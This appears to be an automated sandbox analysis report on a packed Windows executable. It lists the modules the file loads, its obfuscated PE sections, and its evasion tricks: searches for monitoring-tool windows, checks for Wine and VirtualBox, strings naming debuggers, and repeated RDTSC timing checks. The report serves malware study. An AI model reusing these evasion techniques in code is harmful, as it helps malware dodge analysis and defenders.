Source: C:\Users\user\Desktop\HZhObFuFNe.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeSection loaded: kernel.appcore.dllJump to behavior
Source: HZhObFuFNe.exeStatic file information: File size 4470784 > 1048576
Source: HZhObFuFNe.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x284c00
Source: HZhObFuFNe.exeStatic PE information: Raw size of vdxoyfiw is bigger than: 0x100000 < 0x1bb000

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\HZhObFuFNe.exeUnpacked PE file: 0.2.HZhObFuFNe.exe.c20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vdxoyfiw:EW;lxmogbqr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vdxoyfiw:EW;lxmogbqr:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: HZhObFuFNe.exeStatic PE information: real checksum: 0x448b1e should be: 0x44440d
Source: HZhObFuFNe.exeStatic PE information: section name:
Source: HZhObFuFNe.exeStatic PE information: section name: .idata
Source: HZhObFuFNe.exeStatic PE information: section name:
Source: HZhObFuFNe.exeStatic PE information: section name: vdxoyfiw
Source: HZhObFuFNe.exeStatic PE information: section name: lxmogbqr
Source: HZhObFuFNe.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01E1749C push eax; ret 0_3_01E1749D
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01E1749C push eax; ret 0_3_01E1749D
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01E1F158 push ebx; iretd 0_3_01E1F159
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01E1F158 push ebx; iretd 0_3_01E1F159
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01E1F158 push ebx; iretd 0_3_01E1F159
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01E1749C push eax; ret 0_3_01E1749D
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01E1749C push eax; ret 0_3_01E1749D
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01E1F158 push ebx; iretd 0_3_01E1F159
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01E1F158 push ebx; iretd 0_3_01E1F159
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01E1F158 push ebx; iretd 0_3_01E1F159
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01E29C1D push ecx; ret 0_3_01E29C1F
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01E29C1D push ecx; ret 0_3_01E29C1F
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01DD33D8 push edi; ret 0_3_01DD347A
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01DD3289 push edi; ret 0_3_01DD347A
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01DD3289 push edi; ret 0_3_01DD347A
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01DD34A0 push edi; retf 0_3_01DD34BA
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01DD34A0 push edi; retf 0_3_01DD34BA
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01DE13A0 pushad ; iretd 0_3_01DE13A1
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01DD5B50 push esi; retn 0047h0_3_01DD5F7A
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01DD5B50 push esi; retn 0047h0_3_01DD5F7A
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01DD8578 push 00000040h; ret 0_3_01DD8892
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01DD5B60 push esi; retn 0047h0_3_01DD5F7A
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01DD8623 push 00000040h; ret 0_3_01DD8892
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01DD8623 push 00000040h; ret 0_3_01DD8892
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01DD5B50 push esi; retn 0047h0_3_01DD5F7A
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01DD5B50 push esi; retn 0047h0_3_01DD5F7A
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01DD3289 push edi; ret 0_3_01DD347A
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01DD3289 push edi; ret 0_3_01DD347A
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01DD34A0 push edi; retf 0_3_01DD34BA
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01DD34A0 push edi; retf 0_3_01DD34BA
Source: C:\Users\user\Desktop\HZhObFuFNe.exeCode function: 0_3_01DD8623 push 00000040h; ret 0_3_01DD8892
Source: HZhObFuFNe.exeStatic PE information: section name: vdxoyfiw entropy: 7.95517720558757

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\HZhObFuFNe.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeWindow searched: window name: RegmonclassJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\HZhObFuFNe.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\HZhObFuFNe.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: HZhObFuFNe.exe, 00000000.00000003.1399095536.0000000007A36000.00000004.00001000.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: PROCMON.EXE
Source: HZhObFuFNe.exe, 00000000.00000003.1399095536.0000000007A36000.00000004.00001000.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: X64DBG.EXE
Source: HZhObFuFNe.exe, 00000000.00000003.1399095536.0000000007A36000.00000004.00001000.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WINDBG.EXE
Source: HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: HZhObFuFNe.exe, 00000000.00000003.1399095536.0000000007A36000.00000004.00001000.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14EFE6F second address: 14EFEA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F6FA52293C2h 0x0000000b popad 0x0000000c jnp 00007F6FA52293BCh 0x00000012 pop ebx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F6FA52293BDh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14EFEA7 second address: 14EFEB2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14EFEB2 second address: 14EFEB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14EEEEB second address: 14EEEF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14EF19F second address: 14EF1BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 jmp 00007F6FA52293C6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14EF343 second address: 14EF347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14EF4CA second address: 14EF4CF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14EF4CF second address: 14EF503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA4524824h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnc 00007F6FA452481Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 ja 00007F6FA4524816h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14EF503 second address: 14EF52A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F6FA52293BFh 0x00000010 push eax 0x00000011 pop eax 0x00000012 jbe 00007F6FA52293B6h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14EF52A second address: 14EF547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA4524829h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14F11ED second address: 14F1216 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov si, 8976h 0x0000000f push 00000000h 0x00000011 sub esi, dword ptr [ebp+122D1D3Dh] 0x00000017 call 00007F6FA52293B9h 0x0000001c jl 00007F6FA52293BEh 0x00000022 push esi 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14F1216 second address: 14F1260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 jnp 00007F6FA452481Ah 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 jmp 00007F6FA452481Eh 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c popad 0x0000001d mov eax, dword ptr [eax] 0x0000001f jo 00007F6FA4524825h 0x00000025 jmp 00007F6FA452481Fh 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push esi 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14F1260 second address: 14F1265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14F1367 second address: 14F1371 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14F1418 second address: 14F1423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F6FA52293B6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14F1423 second address: 14F144A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA4524828h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jp 00007F6FA4524828h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14F144A second address: 14F144E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14F14EF second address: 14F14F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14F14F6 second address: 14F155B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov edx, 59DE52DAh 0x0000000f jmp 00007F6FA52293C4h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F6FA52293B8h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 or dword ptr [ebp+122D187Bh], eax 0x00000036 call 00007F6FA52293B9h 0x0000003b push esi 0x0000003c push edi 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14F155B second address: 14F1566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14F1566 second address: 14F15A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 je 00007F6FA52293CEh 0x0000000b jmp 00007F6FA52293C8h 0x00000010 popad 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push esi 0x00000019 pop esi 0x0000001a jmp 00007F6FA52293BEh 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14F15A2 second address: 14F15A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 14F15A8 second address: 14F15AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1510B35 second address: 1510B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1510B3B second address: 1510B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1510B3F second address: 1510B43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1510CBE second address: 1510D00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F6FA52293B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d jne 00007F6FA52293F9h 0x00000013 pushad 0x00000014 jmp 00007F6FA52293BBh 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007F6FA52293C7h 0x00000020 ja 00007F6FA52293B6h 0x00000026 popad 0x00000027 push esi 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1510E87 second address: 1510E9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F6FA452481Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1511673 second address: 151168B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6FA52293BEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151168B second address: 151168F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151168F second address: 1511693 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1511693 second address: 1511699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1511803 second address: 1511807 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1512421 second address: 1512425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151257C second address: 1512580 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1512580 second address: 15125A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F6FA452481Ch 0x0000000f jbe 00007F6FA4524816h 0x00000015 jno 00007F6FA452481Ch 0x0000001b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1512A3C second address: 1512A68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F6FA52293B6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007F6FA52293C8h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1512A68 second address: 1512A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1512A6C second address: 1512A97 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6FA52293B6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007F6FA52293CBh 0x00000016 jmp 00007F6FA52293C3h 0x0000001b push esi 0x0000001c pop esi 0x0000001d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1513AC0 second address: 1513AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1513AC6 second address: 1513ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 1513ACB second address: 1513AD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151DB19 second address: 151DB1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151DB1F second address: 151DB45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jnp 00007F6FA4524816h 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F6FA4524822h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151DB45 second address: 151DB6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F6FA52293C6h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151DB6A second address: 151DB6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151DB6F second address: 151DB89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293C2h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151DB89 second address: 151DB8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151DB8D second address: 151DB93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151D2B4 second address: 151D2C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007F6FA4524816h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151D6BA second address: 151D6DF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007F6FA52293B6h 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6FA52293C5h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151D6DF second address: 151D6E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151D84A second address: 151D85F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jmp 00007F6FA52293BFh 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151D85F second address: 151D86B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F6FA4524816h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151D9B9 second address: 151D9D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA52293C2h 0x00000007 jo 00007F6FA52293B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HZhObFuFNe.exeRDTSC instruction interceptor: First address: 151D9D9 second address: 151D9E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
